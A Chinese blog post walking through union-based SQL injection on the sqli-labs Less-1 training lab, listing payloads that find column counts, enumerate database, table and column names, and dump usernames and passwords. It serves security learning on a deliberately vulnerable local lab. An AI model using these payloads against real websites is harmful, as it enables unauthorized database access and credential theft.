SQL注入实例(sqli-labs/less-1)

魏大橙2024-05-11 13:51

初始网页

从网页可知传递的参数名为 id,并且为数字类型

1、得知数据表有多少列

1.1 使用联合查询查找列数(效率低)
sql 复制代码 
http://localhost/sqli-labs-master/Less-1/?id=1' union select 1,2 --+
1.2 使用order by查找列数(效率高)
sql 复制代码 
http://localhost/sqli-labs-master/Less-1/?id=1' order by 3 --+

2、查看回显位置

sql 复制代码 
?id=-1' union select 1,2,3 --+

3、查询当前数据库名

sql 复制代码 
?id=-1' union select 1,database(),3 --+

4、查询当前表名

sql 复制代码 
?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+

5、查询列名

sql 复制代码 
?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users'--+

6、查询最终数据

sql 复制代码 
?id=-1' union select 1,group_concat(username,0x3a,password),3 from users --+

其他

查询当前数据库版本

sql 复制代码 
?id=-1' union select 1,version(),3 --+

查询当前登录用户

sql 复制代码 
?id=-1' union select 1,user(),3 --+
相关推荐
chennalC#c.h.JA Ptho19 分钟前
kubuntu系统详解
linux·数据库·经验分享·postgresql·系统安全
DavieLau34 分钟前
Python开发后端InfluxDB数据库测试接口
服务器·数据库·python·时序数据库
悟能不能悟35 分钟前
关于 javax.validation.constraints的详细说明
数据库·mysql
.生产的驴1 小时前
Docker 部署Nexus仓库 搭建Maven私服仓库 公司内部仓库
java·运维·数据库·spring·docker·容器·maven
知行021 小时前
MySQL的Docker版本,部署在ubantu系统
数据库·mysql·docker
朝新_1 小时前
【MySQL】第三弹——表的CRUD进阶(一)数据库约束
数据库·mysql
为美好的生活献上中指2 小时前
java每日精进 5.11【WebSocket】
java·javascript·css·网络·sql·websocket·网络协议
qq_14182697322 小时前
python通过curl访问deepseek的API调用案例
java·数据库·python
可喜~可乐2 小时前
C# SQLite高级功能示例
数据库·sql·sqlite·c#
cooldream20093 小时前
深入理解主从数据库架构与主从复制
数据库·oracle·数据库架构·系统架构师
热门推荐
01YOLOv8入门 | 重要性能衡量指标、训练结果评价及分析及影响mAP的因素【发论文关注的指标】02从零安装 LLaMA-Factory 微调 Qwen 大模型成功及所有的坑03KGG转MP3工具|非KGM文件|解密音频04DeepSeek各版本说明与优缺点分析05【SpeedAI科研小助手】2分钟极速解决知网维普重复率、AIGC率过高,一键全文降!文件格式不变,公式都保留的!06Coze扣子平台完整体验和实践(附国内和国际版对比)07组基轨迹建模 GBTM的介绍与实现(Stata 或 R)08yolov8,yolo11,yolo12 服务器训练到部署全流程 笔记09苍穹外卖面试总结10YOLOv5改进 | 添加CA注意力机制 + 增加预测层 + 更换损失函数之GIoU